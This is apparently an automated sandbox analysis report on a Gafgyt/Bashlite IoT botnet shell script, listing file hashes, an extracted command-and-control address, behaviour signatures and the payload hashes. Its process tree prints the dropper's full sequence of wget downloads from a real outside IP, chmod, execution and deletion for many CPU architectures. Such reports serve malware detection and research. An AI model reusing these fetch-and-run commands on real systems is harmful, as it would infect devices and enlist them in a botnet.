Analysis
-
max time kernel
124s -
max time network
135s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
19/02/2025, 05:34
General
-
Target
c5f95ebb1efc9aa22c893627faf43c125841ee1080ebfde543432c6dc480679e.sh
-
Size
1KB
-
MD5
bde39538b06d88b7a87b780632cd6cc4
-
SHA1
2d0b08b406f1f662be79d36d76ebd89be884b78a
-
SHA256
c5f95ebb1efc9aa22c893627faf43c125841ee1080ebfde543432c6dc480679e
-
SHA512
dbc9926f5cc977914af3e4b701a2ec24b964232cf1781a3b07a0e43ff95692b2c0efb7dfe6bcda37f9d919e66c75bdd2806f907548427b66f28ccf3d0d503c73
Malware Config
Extracted
gafgyt
209.141.57.97:23
Signatures
-
Detected Gafgyt variant 11 IoCs
-
Gafgyt family
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 11 IoCs
-
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Changes its process name 3 IoCs
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c5f95ebb1efc9aa22c893627faf43c125841ee1080ebfde543432c6dc480679e.sh/tmp/c5f95ebb1efc9aa22c893627faf43c125841ee1080ebfde543432c6dc480679e.sh1⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://209.141.57.97/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/mips./mips2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://209.141.57.97/mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x mipsel2⤵
- File and Directory Permissions Modification
-
-
/tmp/mipsel./mipsel2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://209.141.57.97/sh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x sh42⤵
- File and Directory Permissions Modification
-
-
/tmp/sh4./sh42⤵
-
-
/bin/rmrm -rf sh42⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/x862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x x862⤵
- File and Directory Permissions Modification
-
-
/tmp/x86./x862⤵
-
-
/bin/rmrm -rf x862⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/arm612⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm612⤵
- File and Directory Permissions Modification
-
-
/tmp/arm61./arm612⤵
- Modifies Watchdog functionality
- Changes its process name
-
-
/bin/rmrm -rf arm612⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/i6862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x i6862⤵
- File and Directory Permissions Modification
-
-
/tmp/i686./i6862⤵
-
-
/bin/rmrm -rf i6862⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/ppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/ppc./ppc2⤵
-
-
/bin/rmrm -rf ppc2⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/5862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x 5862⤵
- File and Directory Permissions Modification
-
-
/tmp/586./5862⤵
-
-
/bin/rmrm -rf 5862⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/m68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/m68k./m68k2⤵
-
-
/bin/rmrm -rf m68k2⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/dc2⤵
-
-
/bin/chmodchmod +x dc2⤵
- File and Directory Permissions Modification
-
-
/tmp/dc./dc2⤵
-
-
/bin/rmrm -rf dc2⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/dss2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x dss2⤵
- File and Directory Permissions Modification
-
-
/tmp/dss./dss2⤵
- Modifies Watchdog functionality
- Changes its process name
-
-
/bin/rmrm -rf dss2⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/co2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x co2⤵
- File and Directory Permissions Modification
-
-
/tmp/co./co2⤵
- Modifies Watchdog functionality
- Changes its process name
-
-
/bin/rmrm -rf co2⤵
-
-
/usr/bin/wgetwget http://209.141.57.97/scar2⤵
-
-
/bin/chmodchmod +x scar2⤵
- File and Directory Permissions Modification
-
-
/tmp/scar./scar2⤵
-
-
/bin/rmrm -rf scar2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107KB
MD589237fc2562becf3d68d120d9fecf9c2
SHA17ebde82f839a297dcd1783bb709bf58e0c481eb7
SHA256b43d63bac2153605adfa2e18bef3631854e62521f7e0cbee53fd8d23aeaef320
SHA5123172921bb78110597fb4e77162c1d823b736a330cac813f1932812708af9e85556c78b8c00b11b68206422ada974185a0f2545e104fbefe77cb49e93be3fea85
-
Filesize
174KB
MD5cc47f647effcbdc799eac084793fe2b6
SHA141bff1e23f49118dba938bf0830b06270417a131
SHA2564c925b9ea4ab9a227fc0149febd952595eb85e140ebf80b33463aeabac85f45d
SHA5128f8b709e1571c1de040eb6af0b61ed87222a484d454a967a7b84319d34575ae282c95646f9244fb28550580231741e4cac751f4163e646926cf29a22bca44027
-
Filesize
174KB
MD510c8c17966008b44a4a60deb8b3781fe
SHA1a6612ab9ec75adf01f332db7d90cfb91d8c0ca5e
SHA25630e13435ba167a3c0576f8ff0624eacbdb356b1688b44972746c924391951a95
SHA5123848de61e51eafb8652de762b09450bf9a2a1a7262d2f2271db8f34b00ac3f034111a3ee6e90087e42e1247a9f5d658cd976468a3a497fb4a60c12ec1ba0862f
-
Filesize
135KB
MD532a214010e28149753918f9ba39eb43f
SHA1e2975403de7879ef181e2266e87e50181b18d85b
SHA256e58374fa4f884544f86d4447a145a718e66159dbebc5ddf58c3e7686589c319f
SHA512a91539bc696ca58bf68bc9de0d183ade51fae363e65567ed75ccafd4ffff9c9a3b9d9edaac5b1e74271d134526b1c6c2feed984812505479b816ea98a82a826e
-
Filesize
111KB
MD5b6ab9062ea1dc922ea752cb25887c660
SHA1996ee159455868802a6840f0267c53df1a1131fb
SHA25675f78b921ec1f3e939f0883fcf9744e463e0c48d867d1319034d37c144abf494
SHA512ddcd054e938996c01aa0854cc60407423add8854435561af7293f75ea5c99900d2c87a16bf1e53cb5359af179555b1806f7472256259c48f123511f041427e7f
-
Filesize
129KB
MD5aa1e94459bff5fa03d43b35b6867c75f
SHA136d9e5ef9d8043ed90f22fb21a88440a42a627ad
SHA256381598c30562e084f8fcca53f2f42c2c670138b9a2ea5b4dd09c422006c3a9b4
SHA512065bcda2f098146f9e2e9e49a4365b4595c0229ba46f9f0ad84743bf8bd786666494068aebda08c61b1a2694d42d42ac24dd5b3723d9f7e77d394c8483808fb4
-
Filesize
176KB
MD5737dc65c97061db8856daae61f0c183a
SHA1d961d927f77ae330579ee1ac83ebb8e85a880d82
SHA2569c1c47ecf0f4d8571b8f25ce992cd92a4802ec5321ab3e3fa4204a1b9215721c
SHA5121de3553334c8765bb9a9c73f64bfb1f2e6a9a412eca0812f5c1ce3ade14c587cb4e0a418cfb9950917e6fd6e28dc8dda71fb85327dbe59c11bd34732a7ab0fd4
-
Filesize
176KB
MD577cf21f0635467b7f058badd33945d2d
SHA1e410765cdd01eb0cb585577dafff2b9f43fe65df
SHA2568b1e3796c8966e3bb399971971af13cf8572f3b5f453cfc0406aedede30f0157
SHA51261958f76d08554fb639ea3a98408eee3d9a9a7b6a02b376856141f5068f17907ad5c2fbd296deecf18cb39d6db8b21c730753de482d5e923348d1554c83c1a19
-
Filesize
128KB
MD56ec422dcfe64bdcff59b19dd9acc9cdd
SHA1d0b2c41b3a8675461f8e4070ec2907388a30beac
SHA25629621272a92605c990bd97c18fa54322b07c7b13f0b169aa8ebb3ae1ea867db7
SHA512fc2aeedf328aed97160b39e492f5ea099ce66578bdfb47c1f3d35b9cb656319b28fe66452befc8e8b3ed54e7a7893b78ff8816698407349d861e9cf7c4651f5e
-
Filesize
123KB
MD5ad428e3efc8abc54e433d34f0221849e
SHA14311b879d3e764c2a4d8736ae40cd9cfc04002ce
SHA25692070511b632df604c7da6805aae29b99c1e7f54b1abbed23562a22721283f03
SHA512e9c60340e51a54aad4a9062a327ecf9df0aa6fc3feefa9f7e667e807c91275a6a26c218b3fa7c07ba617d0ab667c2c70f4ceecea75c201cb0b1611385f132711
-
Filesize
127KB
MD56490534077986eacdf5b0c5d8e7b3ad0
SHA1d2df89d1ef2a86df58c57f489a5efcb80fdea840
SHA256a90fa3c9213b835866a288ab034f54238293ba2777150044bf2929c77fd7b6ab
SHA512002b310a063e8471620cd8f2788a6571954d1a23d3ab8cede6f46c3eb4d4162423d9218b65bfd05bbd68285c128f6ee5b50ddebe3b7c8fa361e4b64005ced848